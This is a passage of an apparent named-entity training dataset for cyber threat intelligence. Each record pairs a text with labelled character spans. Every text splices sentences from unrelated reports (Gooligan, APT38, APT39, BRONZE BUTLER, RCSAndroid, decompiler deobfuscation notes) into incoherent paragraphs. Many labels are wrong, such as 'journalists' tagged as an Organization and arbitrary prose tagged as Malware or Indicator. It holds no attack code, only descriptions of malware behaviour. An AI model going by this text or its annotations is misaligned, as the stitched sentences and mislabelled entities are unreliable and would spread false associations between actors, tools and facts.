What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": [{"start": 210, "end": 215, "label": "Organization"}, {"start": 220, "end": 231, "label": "Organization"}, {"start": 298, "end": 316, "label": "Organization"}, {"start": 474, "end": 492, "label": "Organization"}]} {"text": "As this is a complex process , we recommend powering off your device and approaching a certified technician , or your mobile service provider , to request that your device be \u201c re-flashed. \u201d Change your Google account passwords immediately after this process . APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry . This is important to perform in each maturity level as the obfuscated code could be modified or removed as the code becomes more optimized . Both TANKTRAP GPOs deployed CADDYWIPER from a staged directory to systems as msserver.exe .", "spans": [{"start": 203, "end": 209, "label": "Organization"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 287, "end": 312, "label": "Organization"}, {"start": 348, "end": 363, "label": "Organization"}, {"start": 368, "end": 376, "label": "Organization"}, {"start": 401, "end": 419, "label": "Organization"}, {"start": 568, "end": 581, "label": "Organization"}, {"start": 591, "end": 601, "label": "Malware"}, {"start": 640, "end": 652, "label": "Indicator"}]} {"text": "How do Android devices become infected ? This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization . We defined two patterns for analysis of the ANEL sample . 
the second with invalid handle 0 , will return 0 or should be 0 in normal systems , this could be antisandboxemulation not sure as the functions return value is not used .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 272, "end": 276, "label": "Malware"}, {"start": 286, "end": 318, "label": "Malware"}, {"start": 321, "end": 367, "label": "Malware"}]} {"text": "We found traces of the Gooligan malware code in dozens of legitimate-looking apps on third-party Android app stores . Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state . The global variable value dword_745BB58C is either even or odd , The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": [{"start": 23, "end": 31, "label": "Malware"}, {"start": 97, "end": 104, "label": "System"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 184, "end": 190, "label": "Organization"}, {"start": 383, "end": 394, "label": "Malware"}, {"start": 399, "end": 413, "label": "Malware"}, {"start": 432, "end": 439, "label": "Malware"}]} {"text": "These stores are an attractive alternative to Google Play because many of their apps are free , or offer free versions of paid apps . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea . 
so dword_745BB58C * ( dword_745BB58C \u2013 1 ) The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": [{"start": 46, "end": 57, "label": "System"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 259, "end": 274, "label": "Organization"}, {"start": 285, "end": 296, "label": "Organization"}, {"start": 317, "end": 324, "label": "Organization"}, {"start": 492, "end": 505, "label": "System"}, {"start": 533, "end": 556, "label": "Organization"}, {"start": 574, "end": 578, "label": "Indicator"}, {"start": 599, "end": 622, "label": "Organization"}]} {"text": "However , the security of these stores and the apps they sell aren \u2019 t always verified . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . is always even . The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": [{"start": 136, "end": 144, "label": "System"}, {"start": 151, "end": 159, "label": "System"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 249, "end": 253, "label": "Organization"}]} {"text": "Gooligan-infected apps can also be installed using phishing scams where attackers broadcast links to infected apps to unsuspecting users via SMS or other messaging services . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) . 
This results in The email would start a conversation between the attackers and victims sometimes being quite lengthy to establish trust , which would include the attackers encouraging the victim to open a registration link hosted by a real website that had already been compromised by the attackers .", "spans": [{"start": 0, "end": 17, "label": "Malware"}, {"start": 284, "end": 289, "label": "Organization"}, {"start": 300, "end": 315, "label": "Organization"}, {"start": 326, "end": 337, "label": "Organization"}, {"start": 358, "end": 365, "label": "Organization"}, {"start": 659, "end": 672, "label": "Organization"}, {"start": 689, "end": 695, "label": "Organization"}]} {"text": "How did Gooligan emerge ? APT38 . the lowest bit of the negated value becoming 1 . On 24 February , a cyber - attack against Viasat began approximately 1 hour before Russia launched its major invasion of Ukraine .", "spans": [{"start": 8, "end": 16, "label": "Malware"}, {"start": 26, "end": 31, "label": "Organization"}, {"start": 125, "end": 131, "label": "Organization"}]} {"text": "Our researchers first encountered Gooligan \u2019 s code in the malicious SnapPea app last year . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . 
Thus , In light of this , Mandiant has used the following approaches to identify potential exploitation of CVE-2023 - 4966 and subsequent session hijacking .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 69, "end": 76, "label": "Malware"}, {"start": 140, "end": 148, "label": "System"}, {"start": 155, "end": 163, "label": "System"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 253, "end": 257, "label": "Organization"}, {"start": 286, "end": 294, "label": "Organization"}, {"start": 367, "end": 382, "label": "Vulnerability"}]} {"text": "At the time this malware was reported by several security vendors , and attributed to different malware families like Ghostpush , MonkeyTest , and Xinyinhe . APT38 's targeting of financial institutions is most likely an effort by the North Korean government to supplement their heavily-sanctioned economy . OR by -2 ( 0xFFFFFFFE ) But as a new documentary series on Hulu reveals [ SPOILER ALERT ! ] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": [{"start": 118, "end": 127, "label": "Malware"}, {"start": 130, "end": 140, "label": "Malware"}, {"start": 147, "end": 155, "label": "Malware"}, {"start": 158, "end": 163, "label": "Organization"}, {"start": 180, "end": 202, "label": "Organization"}, {"start": 367, "end": 371, "label": "Organization"}]} {"text": "By late 2015 , the malware \u2019 s creators had gone mostly silent until the summer of 2016 when the malware reappeared with a more complex architecture that injects malicious code into Android system processes . We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East . will always produce the value -1 . 
Days later , KillNet claimed to target the European Investment Bank ( EIB ) .", "spans": [{"start": 182, "end": 189, "label": "System"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 423, "end": 430, "label": "Organization"}, {"start": 453, "end": 477, "label": "Organization"}, {"start": 480, "end": 483, "label": "Organization"}]} {"text": "The change in the way the malware works today may be to help finance the campaign through fraudulent ad activity . APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats . In this case , If this is the primary reason why someone might be after your companys data , simple preventative measures could be used to deter these attacks from happening .", "spans": [{"start": 115, "end": 120, "label": "Organization"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 218, "end": 225, "label": "Organization"}]} {"text": "The malware simulates clicks on app advertisements provided by legitimate ad networks and forces the app to install on a device . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . the pattern matching function replaces dword_745BB58C * ( dword_745BB58C \u2013 1 ) Investigate anomalous activity and correlate findings with process telemetry .", "spans": [{"start": 130, "end": 135, "label": "Organization"}, {"start": 152, "end": 192, "label": "Organization"}, {"start": 279, "end": 299, "label": "Organization"}]} {"text": "An attacker is paid by the network when one of these apps is installed successfully . 
Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents . with 2 . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": [{"start": 92, "end": 98, "label": "Organization"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 141, "end": 154, "label": "Organization"}, {"start": 215, "end": 236, "label": "Organization"}, {"start": 239, "end": 250, "label": "Organization"}, {"start": 253, "end": 264, "label": "Organization"}, {"start": 271, "end": 281, "label": "Organization"}, {"start": 319, "end": 332, "label": "Organization"}, {"start": 368, "end": 375, "label": "Organization"}, {"start": 437, "end": 450, "label": "System"}]} {"text": "Logs collected by Check Point researchers show that every day Gooligan installs at least 30,000 apps fraudulently on breached devices or over 2 million apps since the campaign began . Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands . The global variable value dword_72DBB588 is always 0 because the value is not initialized ( we can check it by is_loaded API ) This markup becomes unescaped , causing arbitrary markup to be injected into the document .", "spans": [{"start": 18, "end": 29, "label": "Organization"}, {"start": 62, "end": 70, "label": "Malware"}, {"start": 184, "end": 190, "label": "System"}, {"start": 231, "end": 238, "label": "Organization"}, {"start": 412, "end": 425, "label": "System"}, {"start": 428, "end": 517, "label": "Vulnerability"}]} {"text": "How does Gooligan work ? Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands . and has only read accesses . 
The goal of studying IoAs is to understand the intent of a malicious user accessing the information and network resources of the organization , even when a malicious payload is not yet delivered , and all computing interactions can be considered as legitimate and authorized .", "spans": [{"start": 9, "end": 17, "label": "Malware"}, {"start": 25, "end": 31, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 194, "end": 198, "label": "Indicator"}, {"start": 232, "end": 246, "label": "Organization"}, {"start": 329, "end": 346, "label": "Malware"}]} {"text": "The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device . One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B . So the pattern matching function replaces the global variable with 0 . 3AM is socalled because it appends encrypted files with the extension .threeamtime .", "spans": [{"start": 58, "end": 75, "label": "Malware"}, {"start": 117, "end": 122, "label": "Organization"}, {"start": 139, "end": 146, "label": "Organization"}, {"start": 154, "end": 171, "label": "System"}, {"start": 210, "end": 216, "label": "Organization"}, {"start": 224, "end": 239, "label": "System"}, {"start": 244, "end": 261, "label": "System"}, {"start": 335, "end": 338, "label": "Malware"}]} {"text": "Our research team has found infected apps on third-party app stores , but they could also be downloaded by Android users directly by tapping malicious links in phishing attack messages . APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol ( RDP ) , Secure Shell ( SSH ) , PsExec , RemCom , and xCmdSvc . 
There are some variants with this pattern ( e.g , the variable \u2013 10 < 0 ) Given that threat actors use red team tools and public exploitation frameworks for targeted threat activity in the wild , we believe COSMICENERGY poses a plausible threat to affected electric grid assets .", "spans": [{"start": 107, "end": 114, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 251, "end": 274, "label": "System"}, {"start": 277, "end": 280, "label": "System"}, {"start": 285, "end": 297, "label": "System"}, {"start": 300, "end": 303, "label": "System"}, {"start": 308, "end": 314, "label": "System"}, {"start": 317, "end": 323, "label": "System"}, {"start": 330, "end": 337, "label": "System"}, {"start": 425, "end": 438, "label": "Organization"}, {"start": 443, "end": 457, "label": "System"}, {"start": 462, "end": 492, "label": "Organization"}, {"start": 547, "end": 559, "label": "Malware"}, {"start": 597, "end": 617, "label": "System"}]} {"text": "After an infected app is installed , it sends data about the device to the campaign \u2019 s Command and Control ( C & C ) server . The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation . , Command messages are used in ICS networks to give direct instructions to control systems devices .", "spans": [{"start": 131, "end": 136, "label": "Organization"}]} {"text": "Gooligan then downloads a rootkit from the C & C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT ( CVE-2013-6282 ) and Towelroot ( CVE-2014-3153 ) . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . where the immediate constant can be different . 
PIEHOP expects its main function to be called via another Python file , supplying either the argument or .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 89, "end": 104, "label": "System"}, {"start": 139, "end": 144, "label": "Vulnerability"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 167, "end": 176, "label": "Vulnerability"}, {"start": 179, "end": 192, "label": "Vulnerability"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 251, "end": 258, "label": "Organization"}, {"start": 302, "end": 318, "label": "Vulnerability"}, {"start": 444, "end": 455, "label": "Organization"}, {"start": 506, "end": 512, "label": "System"}]} {"text": "These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android , or the patches were never installed by the user . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . We also observed a pattern that was also using an 8-bit portion of the register . Depending on the campaign , the final payload or the third intermediate stage is appended as an encrypted binary blob to the end of the image .", "spans": [{"start": 128, "end": 135, "label": "System"}, {"start": 218, "end": 234, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 304, "end": 320, "label": "Vulnerability"}, {"start": 446, "end": 457, "label": "Organization"}]} {"text": "If rooting is successful , the attacker has full control of the device and can execute privileged commands remotely . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" . 
In the following example , US by the numbers", "spans": [{"start": 137, "end": 149, "label": "Organization"}, {"start": 178, "end": 188, "label": "Organization"}]} {"text": "After achieving root access , Gooligan downloads a new , malicious module from the C & C server and installs it on the infected device . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . the variable v5 in pseudocode is a register operand ( cl ) Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": [{"start": 30, "end": 38, "label": "Malware"}, {"start": 137, "end": 146, "label": "Organization"}, {"start": 157, "end": 173, "label": "Organization"}, {"start": 191, "end": 232, "label": "Vulnerability"}, {"start": 235, "end": 248, "label": "Vulnerability"}, {"start": 295, "end": 301, "label": "System"}]} {"text": "This module injects code into running Google Play or GMS ( Google Mobile Services ) to mimic user behavior so Gooligan can avoid detection , a technique first seen with the mobile malware HummingBad . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . in microcode . 
Anonymous Sudan", "spans": [{"start": 38, "end": 49, "label": "System"}, {"start": 53, "end": 83, "label": "System"}, {"start": 110, "end": 118, "label": "Malware"}, {"start": 188, "end": 198, "label": "Malware"}, {"start": 201, "end": 210, "label": "Organization"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 244, "end": 285, "label": "Vulnerability"}, {"start": 288, "end": 301, "label": "Vulnerability"}, {"start": 348, "end": 354, "label": "System"}, {"start": 430, "end": 445, "label": "Organization"}]} {"text": "The module allows Gooligan to : Steal a user \u2019 s Google email account and authentication token information Install apps from Google Play and rate them to raise their reputation Install adware to generate revenue Ad servers , which don \u2019 t know whether an app using its service is malicious or not , send Gooligan the names of the apps to download from Google Play . BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics . We need to check if the value comes from the result of x * ( x \u2013 1 ) Tools used by the attackers in this campaign included", "spans": [{"start": 18, "end": 26, "label": "Malware"}, {"start": 49, "end": 55, "label": "Organization"}, {"start": 125, "end": 136, "label": "System"}, {"start": 304, "end": 312, "label": "Malware"}, {"start": 352, "end": 363, "label": "System"}, {"start": 366, "end": 376, "label": "Organization"}, {"start": 445, "end": 453, "label": "Organization"}, {"start": 525, "end": 530, "label": "System"}, {"start": 543, "end": 552, "label": "Organization"}, {"start": 561, "end": 569, "label": "Organization"}]} {"text": "After an app is installed , the ad service pays the attacker . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry . . 
An additional field of interest in the XPdb was the exec_cdhash , which contains the cdhash , or Code Directory hash , of the executed binaries .", "spans": [{"start": 63, "end": 76, "label": "Organization"}, {"start": 93, "end": 106, "label": "Organization"}, {"start": 111, "end": 115, "label": "Organization"}, {"start": 123, "end": 143, "label": "Organization"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 253, "end": 266, "label": "Organization"}, {"start": 269, "end": 294, "label": "Organization"}, {"start": 301, "end": 321, "label": "Organization"}, {"start": 398, "end": 469, "label": "Indicator"}]} {"text": "Then the malware leaves a positive review and a high rating on Google Play using content it receives from the C & C server . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . In another example , Last , it sends a single \u201c C_CS_NA_1 \u2013 clock synchronization command \u201d to the target station , which synchronizes the remote station time clock with the time clock for the device issuing the commands .", "spans": [{"start": 63, "end": 74, "label": "System"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 155, "end": 168, "label": "Organization"}, {"start": 173, "end": 177, "label": "Organization"}, {"start": 185, "end": 205, "label": "Organization"}, {"start": 236, "end": 255, "label": "Organization"}, {"start": 276, "end": 289, "label": "Organization"}, {"start": 292, "end": 317, "label": "Organization"}, {"start": 324, "end": 344, "label": "Organization"}]} {"text": "Our research team was able to identify several instances of this activity by cross-referencing data from breached devices with Google Play app reviews . 
In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets . the variable v2 in pseudocode is a register operand ( ecx ) WarDefense extrinsic In the 21st century it would be irresponsible to ignore the fact that nation states and even patriot hackers play in either initiating or defending against adversaries .", "spans": [{"start": 127, "end": 138, "label": "System"}, {"start": 163, "end": 176, "label": "Organization"}, {"start": 257, "end": 272, "label": "Malware"}, {"start": 487, "end": 502, "label": "Organization"}, {"start": 550, "end": 561, "label": "Organization"}]} {"text": "This is another reminder of why users shouldn \u2019 t rely on ratings alone to decide whether to trust an app . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 \u2014 at least based on the file properties of the decoy documents they've been sending to their targets . in microcode . Evidence of compromise was observed within the JumpCloud agent log located at the file path /private / var / log / jcagent.log .", "spans": [{"start": 118, "end": 131, "label": "Organization"}, {"start": 242, "end": 257, "label": "Malware"}, {"start": 356, "end": 439, "label": "Indicator"}]} {"text": "Similar to HummingBad , the malware also fakes device identification information , such as IMEI and IMSI , to download an app twice while seeming like the installation is happening on a different device , thereby doubling the potential revenue . Secureworks\u00ae incident responders and Counter Threat Unit\u2122 ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People . We have to validate if a global variable with above-mentioned conditions is assigned to the register . 
While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month \u2019s review we speculated that Royal might be going through a rebrand .", "spans": [{"start": 11, "end": 21, "label": "Malware"}, {"start": 246, "end": 258, "label": "Organization"}, {"start": 306, "end": 309, "label": "Organization"}, {"start": 368, "end": 381, "label": "Organization"}, {"start": 398, "end": 402, "label": "Organization"}, {"start": 405, "end": 417, "label": "Organization"}, {"start": 710, "end": 715, "label": "Organization"}]} {"text": "What are Google authorization tokens ? Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms . Data-flow tracking code was added to detect these use-cases . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": [{"start": 9, "end": 15, "label": "Organization"}, {"start": 79, "end": 84, "label": "Organization"}, {"start": 237, "end": 261, "label": "Organization"}, {"start": 334, "end": 341, "label": "Organization"}]} {"text": "A Google authorization token is a way to access the Google account and the related services of a user . BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools . The added code requires that the mblock_t pointer information is passed from the argument of optinsn_t : :f unc to trace back previous instructions using the mblock_t linked list . 
Table 1 : Malicious OT files Filename Hash Purpose a.iso Unknown Contains attacker \u2019s files lun.vbs 26e2a41f26ab885bf409982cb823ffd1", "spans": [{"start": 2, "end": 8, "label": "Organization"}, {"start": 52, "end": 58, "label": "Organization"}, {"start": 104, "end": 117, "label": "Organization"}, {"start": 165, "end": 173, "label": "System"}, {"start": 178, "end": 186, "label": "System"}, {"start": 207, "end": 213, "label": "System"}, {"start": 218, "end": 224, "label": "System"}, {"start": 268, "end": 276, "label": "System"}, {"start": 328, "end": 346, "label": "System"}, {"start": 393, "end": 401, "label": "System"}, {"start": 426, "end": 515, "label": "Indicator"}]} {"text": "It is issued by Google once a user successfully logged into this account . BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment . However , Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": [{"start": 16, "end": 22, "label": "Organization"}, {"start": 75, "end": 88, "label": "Organization"}, {"start": 302, "end": 519, "label": "Malware"}]} {"text": "When an authorization token is stolen by a hacker , they can use this token to access all the Google services related to the user , including Google Play , Gmail , Google Docs , Google Drive , and Google Photos . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . the callback returns NULL from the mblock_t pointer if the instruction is not a top-level one . 
Also in 2015 , GReAT identified the Minidionis threat ( known by Kaspersky as CloudLook ) to be another backdoor from the same APT actor \u2013 this time using a cloud drive capability to store and download malware onto infected systems using a multi - dropper scheme .", "spans": [{"start": 94, "end": 100, "label": "Organization"}, {"start": 142, "end": 153, "label": "System"}, {"start": 156, "end": 161, "label": "System"}, {"start": 164, "end": 175, "label": "System"}, {"start": 178, "end": 190, "label": "System"}, {"start": 197, "end": 210, "label": "System"}, {"start": 213, "end": 226, "label": "Organization"}, {"start": 282, "end": 304, "label": "Vulnerability"}, {"start": 499, "end": 507, "label": "System"}, {"start": 575, "end": 580, "label": "Organization"}, {"start": 596, "end": 606, "label": "Malware"}, {"start": 625, "end": 634, "label": "Organization"}, {"start": 638, "end": 647, "label": "Malware"}, {"start": 687, "end": 696, "label": "Organization"}]} {"text": "While Google implemented multiple mechanisms , like two-factor-authentication , to prevent hackers from compromising Google accounts , a stolen authorization token bypasses this mechanism and allows hackers the desired access as the user is perceived as already logged in . The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . 
If the setl is always sub-instruction during the optimization , These groups commonly share infrastructure to complete their actions on objectives .", "spans": [{"start": 6, "end": 12, "label": "Organization"}, {"start": 117, "end": 123, "label": "Organization"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 339, "end": 361, "label": "Vulnerability"}, {"start": 591, "end": 667, "label": "Indicator"}]} {"text": "Conclusion Gooligan has breached over a million Google accounts . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . we never get the pointer . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": [{"start": 11, "end": 19, "label": "Malware"}, {"start": 48, "end": 54, "label": "Organization"}, {"start": 66, "end": 79, "label": "Organization"}, {"start": 162, "end": 176, "label": "System"}, {"start": 202, "end": 216, "label": "Vulnerability"}, {"start": 274, "end": 286, "label": "Malware"}]} {"text": "We believe that it is the largest Google account breach to date , and we are working with Google to continue the investigation . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . 
To handle this type of scenario , For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": [{"start": 34, "end": 40, "label": "Malware"}, {"start": 90, "end": 96, "label": "Organization"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 221, "end": 235, "label": "System"}, {"start": 261, "end": 275, "label": "Vulnerability"}, {"start": 455, "end": 465, "label": "System"}]} {"text": "We encourage Android users to validate whether their accounts have been breached . BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts . the code was modified to catch and pass the mblock_t of the jnz instruction to the sub-instruction . For instance , Rising Sun was observed in attacks before the discovery of ' Sharpshooter ' and shared the tactics , techniques , and procedures ( TTPs ) seen in operations attributed to Lazarus group .", "spans": [{"start": 13, "end": 20, "label": "System"}, {"start": 83, "end": 96, "label": "Organization"}, {"start": 133, "end": 141, "label": "System"}, {"start": 146, "end": 149, "label": "System"}, {"start": 269, "end": 277, "label": "System"}, {"start": 341, "end": 351, "label": "System"}, {"start": 402, "end": 414, "label": "System"}, {"start": 428, "end": 478, "label": "Organization"}, {"start": 512, "end": 525, "label": "Organization"}]} {"text": "Hacking Team Spying Tool Listens to Calls By : Trend Micro July 21 , 2015 Following news that iOS devices are at risk of spyware related to the Hacking Team , the saga continues into the Android sphere . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . 
The original implementation calls the optblock_t : :f unc callback function in MMAT_LOCOPT ( local optimization and graphing are complete ) Today \u2019s announcement comes as cyber security leaders from the 5 Eyes , EU and international allies meet at the NCSC \u2019s Cyber UK conference in Newport to discuss the cyber threats facing the world .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 47, "end": 58, "label": "Organization"}, {"start": 94, "end": 97, "label": "System"}, {"start": 144, "end": 156, "label": "Organization"}, {"start": 187, "end": 194, "label": "System"}, {"start": 243, "end": 254, "label": "Organization"}, {"start": 266, "end": 279, "label": "Organization"}, {"start": 346, "end": 359, "label": "Vulnerability"}, {"start": 484, "end": 503, "label": "System"}, {"start": 525, "end": 536, "label": "System"}, {"start": 617, "end": 639, "label": "Organization"}, {"start": 649, "end": 655, "label": "Organization"}, {"start": 658, "end": 660, "label": "Organization"}, {"start": 665, "end": 685, "label": "Organization"}, {"start": 698, "end": 725, "label": "Organization"}]} {"text": "We found that among the leaked files is the code for Hacking Team \u2019 s open-source malware suite RCSAndroid ( Remote Control System Android ) , which was sold by the company as a tool for monitoring targets . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . maturity level . 
Additionally , by using leaked source code , threat actors can confuse or mislead investigators , as security professionals may be more likely to misattribute the activity to the wrong actor .", "spans": [{"start": 96, "end": 106, "label": "Malware"}, {"start": 109, "end": 138, "label": "Malware"}, {"start": 247, "end": 258, "label": "Organization"}, {"start": 290, "end": 303, "label": "Organization"}, {"start": 370, "end": 383, "label": "Vulnerability"}, {"start": 588, "end": 610, "label": "Organization"}, {"start": 633, "end": 677, "label": "Vulnerability"}]} {"text": "( Researchers have been aware of this suite as early as 2014 . Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm . Rolles previously explained the unflattening algorithm in a Hex-Rays blog . Then , users were prompted to download a malicious trojan .", "spans": [{"start": 96, "end": 99, "label": "Organization"}, {"start": 124, "end": 132, "label": "System"}, {"start": 144, "end": 157, "label": "Organization"}, {"start": 167, "end": 175, "label": "System"}, {"start": 266, "end": 274, "label": "System"}, {"start": 321, "end": 339, "label": "Malware"}]} {"text": ") The RCSAndroid code can be considered one of the most professionally developed and sophisticated Android malware ever exposed . BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan . For brevity I will quickly cover some key points to understand the algorithm at a high level . 
When the victim opened an archive , a second stage dropper executed and a WAV file played like a real voicemail .", "spans": [{"start": 6, "end": 16, "label": "Malware"}, {"start": 99, "end": 106, "label": "System"}, {"start": 130, "end": 143, "label": "Organization"}, {"start": 181, "end": 195, "label": "Organization"}]} {"text": "The leak of its code provides cybercriminals with a new weaponized resource for enhancing their surveillance operations . Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . Normally the call flow graph ( CFG ) The generic campaigns are aimed at various civilian targets in Poland and Ukraine , such as with Excel spreadsheet lures masquerading as value - added tax ( VAT ) return forms .", "spans": [{"start": 122, "end": 130, "label": "Organization"}, {"start": 203, "end": 208, "label": "Organization"}, {"start": 355, "end": 376, "label": "Organization"}, {"start": 452, "end": 488, "label": "Organization"}, {"start": 492, "end": 530, "label": "Organization"}]} {"text": "Based on the leaked code , the RCSAndroid app can do the following intrusive routines to spy on targets : Capture screenshots using the \u201c screencap \u201d command and framebuffer direct reading Monitor clipboard content Collect passwords for Wi-Fi networks and online acco ; .unts , including Skype , Facebook , Twitter , Google , WhatsApp , Mail , and LinkedIn Record using the microphone Collect SMS , MMS , and Gmail messages Record location Gather device information Capture photos using the front and back cameras Collect contacts and decode Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . 
